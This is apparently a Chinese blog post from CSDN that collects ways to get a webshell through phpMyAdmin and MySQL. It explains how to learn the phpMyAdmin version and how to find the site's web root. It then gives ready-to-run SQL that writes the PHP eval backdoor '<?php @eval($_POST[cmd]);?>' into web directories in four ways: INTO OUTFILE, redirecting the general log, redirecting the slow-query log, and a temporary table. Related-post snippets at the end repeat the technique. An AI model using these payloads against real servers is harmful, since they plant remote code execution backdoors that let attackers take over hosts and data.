phpMyAdmin(mysql)常见的写shell方法及版本漏洞汇总

已于 2022-02-21 21:11:14 修改
阅读量7.9k 收藏 21
点赞数 9
分类专栏: 漏洞分析 文章标签: mysql web安全 数据库 database
于 2022-02-21 20:54:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48108919/article/details/123053622
版权

目录

前言

一、查看phpMyAdmin版本方法

二、phpmyadmin常见的getshell方法

1.前提

2.网站物理路径获取方法

3.通过into outfile getshell

4.通过日志文件写 shell

5.通过慢查询写shell

6.创建数据库和表写入webshell

三、phpmyadmin版本漏洞汇总 

总结

前言

phpMyAdmin是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的资料库管理工具 。

一、查看phpMyAdmin版本方法

phpMyAdmin是有很多公开漏洞的,如果能知道phpMyAdmin的版本信息,直接在网上搜索相关版本的漏洞即可利用

获取phpmyadmin版本信息方法:

Documetation.html
Documetation.txt
translators.html
readme.php
README
changelog.php
Change

只要在phpmyadmin目录后面添加以上的文件,逐个尝试就可以看到phpmyadmin的相关版本信息了(前提是管理员没有把记录版本信息的文件删除掉)

如一次真实渗透测试中的信息收集: 

二、phpmyadmin常见的getshell方法

1.前提

通过写shell进行提权,需要满足以下条件:

1.知道网站的物理路径

2.数据库当前操作用户拥有写权限(查询secure_file_priv参数,查看是否具有读写文件权限,若为NULL则没有办法写入shell。这个值是只读变量,只能通过配置文件修改,且更改后需重启服务才生效)

secure_file_priv参数

NULL    不允许导入或导出
/tmp    只允许在 /tmp 目录导入导出
空      不限制目录

2.网站物理路径获取方法

1.通过web报错信息:可以通过各种fuzz不存在的目录尝试让目标报错,有可能爆出绝对路径

2.通过phpinfo()获取路径:在phpinfo页面直接搜索:DOCUMENT_ROOT

 3.通过目录文件信息泄露获取:扫到目录时候每个都尝试访问一下,说不定会有意想不到的收获

4.如果目标站点是利用phpstudy、Xampp、LAMPP等之类搭建的,可以通过查看数据库路径

show variables like '%datadir%';
或者
select @@basedir;

获取到数据库路径后再结合中间件目录结构猜测web目录

经过信息收集已知网站路径位:C:\xampp\htdocs\tieuhoc\codeweb\

3.通过into outfile getshell

1.查看权限

show global variables like '%secure_file_priv%';

 2.写入一句话木马

select '<?php @eval($_POST[cmd]);?>'INTO OUTFILE 'C:\\xampp\\htdocs\\tieuhoc\\a.php'
或者
select '<?php @eval($_POST[cmd]);?>'INTO OUTFILE 'C:/xampp/htdocs/tieuhoc/a.php'

提示:路径可以用‘\\’或者‘/’都可以,后面例子统一用‘\\’

4.通过日志文件写 shell

general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话

查看当前日志文件:

SHOW VARIABLES LIKE 'general%';

开启日志记录

set global general_log = "ON";

更改日志文件路径

set global general_log_file='C:\\xampp\\htdocs\\tieuhoc\\b.php'

往日志文件里写入一句话木马

select '<?php @eval($_POST[cmd]);?>';

5.通过慢查询写shell

show variables like '%slow%'

set global slow_query_log=on;

set global slow_query_log_file='C:\\xampp\\htdocs\\tieuhoc\\c.php'

select '<?php @eval($_POST[cmd]);?>' or sleep(10);

6.创建数据库和表写入webshell

前提:拥有root权限、网站绝对路径已知(并且确定有写入权限); secure_file_priv没有具体值

CREATE TABLE test( id text(200) not null);    

INSERT INTO test (id) VALUES('<?php @eval($_POST[cmd]);?>');    

SELECT id FROM test INTO OUTFILE 'C:\\xampp\\htdocs\\tieuhoc\\e.php';    

DROP TABLE IF EXISTS test;

三、phpmyadmin版本漏洞汇总 

参考链接:最全phpmyadmin漏洞汇总_kracer的博客-CSDN博客_phpmyadmin漏洞

        

总结

拥有读写权限及知道网站物理路径是成功写入webshell的 前提

码啊码
关注
  • 9
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
利用phpmyadmin设置mysql的权限方法
12-16
本文将详细介绍如何利用phpMyAdmin这一流行的Web界面工具来设置MySQL的权限。phpMyAdmin是一款开源的PHP应用程序,它允许用户通过浏览器方便地管理和操作MySQL数据库。 **步骤一:登录root用户** 首先,你需要访问...
phpmyadmin MySQL 加密配置方法
01-21
版本phpMyAdmin-2.6.1.tar.gz为例 先解压phpMyAdmin-2.6.1.tar.gz到/usr/local/apache2/htdocs, 得到文件夹phpMyAdmin-2.6.1,将其重命名为phpmyadmin,(这样在以后的操作中将会变的简便)。 进入到phpmyadmin...
总结分析 | 基于phpmyadmin的渗透测试
小司机的奥拓
09-22 2703
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。
phpmyadmin getshell总结
good good study
10-25 3156
phpMyAdmin 是一个用PHP编的开源软件工具,可以通过web方式控制和操作MySQL数据库。通过phpMyAdmin 可以完全对数据库进行操作,例如建立、复制和删除数据等。
phpmyadmin漏洞汇总
最新发布
m0_64481831的博客
05-27 1078
phpmyadmin是一个以PHP为基础,以web方式架构在网站主机上的mysql数据库管理工具,让管理者可用web接口管理mysql数据库,便于远端管理mysql数据库
phpmyadmin反序列化漏洞
qq_53008544的博客
05-01 565
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码。由于配置文件被保存到了服务器上,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
phpMyadminshell
wangyanjienice的博客
04-07 890
select into outfile 使用方法 select load_file('C:/phpStudy/MySQL/shell.php') select '<?php eval($_POST[cmd]); ?>' into outfile 'C:/phpStudy/MySQL/shell.php'; 1.查看绝对目录 select @@basedir; 2.查看入权限 SHOW VARIABLES LIKE "secure_file_priv"; NULL表示禁止,无法
phpmyadminV4.8.1本地文件包含漏洞复现
seek_2022的博客
07-05 2788
出于学习和技术分享的目的,本文针对phpMyadmin-v4.8.1存在的文件包含漏洞,通过代码审计结合本地搭建测试环境的方式进行漏洞复现研究,以供大家参考学习。
实战mysql导出中文乱码及phpmyadmin导入中文乱码的解决方法
12-18
一直不用这个phpmyadmin,在本机也是用navicat,总感觉phpmyadmin速度较慢。这回不行了,没有独立主机,只好用人家给的phpmyadmin了。 第一步:本地数据导出sql文件。心想这对于navicat小事一桩。直接在数据库上右键...
MySql修改密码后phpMyAdmin无法登陆的解决方法
12-16
下面,我们将详细讨论这个问题的原因、解决方法以及相关的MySQLphpMyAdmin配置知识。 **问题原因** 当您通过命令行或其他工具修改了MySQL的root用户密码后,phpMyAdmin中保存的旧密码并不会自动更新。`config.inc...
最全phpmyadmin漏洞汇总
热门推荐
kracer的博客
12-04 3万+
目录 一、phpMyAdmin简介 二、查看phpmyadmin版本 三、历史漏洞及poc利用 1、万能密码直接登入 2、CVE-2009-1151:远程代码执行 3、CVE-2012-5159:任意PHP代码攻击 4、CVE-2013-3238:远程PHP代码执行 5、WooYun-2016-199433:任意文件读取漏洞 6、CVE-2014 -8959:本地文件包含 7、CVE-2016-5734 :后台命令执行RCE 8、CVE-2017-1000499 跨站请求伪造 9、C
可用的PHPmyadmin2.9.0.3
12-07
自己亲自测试可以用,也是一直用的2.9版本,需要用的可以下载使用,有问题的话可以留言
web渗透测试基础入门
03-30
专注培养高薪网络安全人才,帮助大家了解并学习网络安全,传授黑白帽实战技能,带领零基础小白正式踏入入门阶段。一个有实战经验的老师,带你一步一步从基础入门,让你清晰的了解渗透测试的过程和方法,讲解各方面的知识点和经验。
phpMyadmin版本漏洞
aiquan9342的博客
10-04 1088
一: 影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3 ANYUN.ORG   概述:PhpMyAdmin存在PREGREPLACEEVAL漏洞   利用模块:exploit/multi/http/phpmyadminpregreplace CVE: CVE-2013-3238 二: 影响版本phpMyAdmin v3.5....
phpmyadmin getshell
YouthBelief的博客
11-11 4964
phpmyadmin getshell前言一、into outfile马条件利用方法操作二、开启日志马getshell条件利用方法操作三、慢查询webshell利用方法操作四、创建数据库和表webshell条件利用方法特殊版本getshell 前言 phpMyadmin是一个以PHP为基础的MySQL数据库管理工具,使网站管理员可通过Web接口管理数据库。 虽然网上有很多公开的文章,也用过很多次了,但自己再总结一遍方便自己查阅。 一、into outfile马 条件 1.对web目录需要有权限能
WEB安全PHPMyAdmin后台GetShell姿势总结
网络安全知识分享
12-31 4738
PHPMyAdmin后台GetShell姿势总结前言:本地环境:数据库文件导出入利用条件利用方式数据库全局日志入利用条件利用方式数据库慢查询日志入利用条件利用方式CVE-2018-12613利用条件利用方式CVE-2018-19968利用条件利用方式 前言: phpMyAdmin是一个以PHP为基础,以web方式架构在服务器上的MySQL数据库管理工具。让管理者可以通过Web接口来管理MySQL数据库。因其基于Web的简便易操作的图形化界面备受网站管理者的喜爱。 当我们通过其它各类手段获取到MySQ
阿里云服务器漏洞phpmyadmin CVE-2016-6617解决方法
自古红蓝出CP的博客
07-04 4040
phpmyadmin CVE-2016-6617
phpmyadmin新姿势getshell
Au
11-03 6578
百度百科:phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HT...
phpmyadmin之getshell总结
Adminxe的博客
05-03 500
0x00 前言 简单总结下phpmyadmin的gestshell的姿势,总结但不拓展(百度是最好的老师,有时间必定会详细出利用姿势的方法),建议getshell之前,查看用户权限以及phpmyadmin版本,方便对于漏洞的利用。 0x01 getshell姿势 1、selectintooutfile直接入 2、开启全局日志getshell 3、使用慢查询日志getse...
mysqlphpmyadmin安装教程_phpmyadmin安装教程及配置设置
05-30
以下是在Ubuntu操作系统上安装和配置phpMyAdmin的步骤: 1. 首先安装phpMyAdmin和Apache: ``` sudo apt-get update sudo apt-get install phpmyadmin apache2 ``` 2. 安装过程中,系统会提示你选择web服务器,选择apache2,然后再选择yes。 3. 安装完成后,打开Apache2的配置文件,输入以下命令: ``` sudo nano /etc/apache2/apache2.conf ``` 4. 在文件的末尾添加以下代码: ``` Include /etc/phpmyadmin/apache.conf ``` 5. 保存并关闭文件,重启Apache2: ``` sudo systemctl restart apache2 ``` 6. 现在你可以通过访问http://localhost/phpmyadmin来访问phpMyAdmin了。 7. 如果你无法访问phpMyAdmin,可以检查Apache2的错误日志,它会告诉你问题所在: ``` sudo tail -f /var/log/apache2/error.log ``` 8. 如果你需要更改phpMyAdmin的配置,请打开以下文件: ``` sudo nano /etc/phpmyadmin/config.inc.php ``` 9. 在这个文件中,你可以更改phpMyAdmin的设置,例如默认语言、默认主题等等。 以上就是在Ubuntu上安装和配置phpMyAdmin的所有步骤。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

码啊码

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值